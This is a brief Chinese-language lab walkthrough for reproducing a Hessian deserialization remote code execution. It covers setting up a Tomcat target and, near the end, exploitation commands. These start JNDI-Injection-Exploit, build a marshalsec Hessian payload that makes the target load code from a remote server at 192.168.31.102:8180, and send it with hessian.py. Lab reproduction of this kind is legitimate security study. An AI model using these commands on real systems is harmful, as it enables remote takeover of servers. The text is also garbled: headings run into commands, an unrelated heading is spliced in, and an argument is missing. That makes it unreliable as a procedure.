Hessian 反序列化RCE 漏洞
Hessian 反序列化RCE 漏洞
靶机搭建
安装java
安装tomcat
部署Hessian
访问:
启动JNDI 利⽤⼯具
-C 为需要执⾏的命令
-A 为监听地址spring framework rce漏洞复现
⽣成payload
发送payload 到hessian 服务器这⾥的报错是因为我python 环境的问题
这⾥我踩了⼀个坑,hessian.py ⾥需要⽤到⼀个包,我本机的环境⼀直出问题,最后更新了pip,更新了argparse 包才搞定命令执⾏成功
指纹java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar - -A 192.168.31.102
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Resin 192.168.31.102:8180/ ExecTemplateJDK7>hession python hessian.py -u 192.168.31.36:8080/HessianTest/hessian -p hession
argparse

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。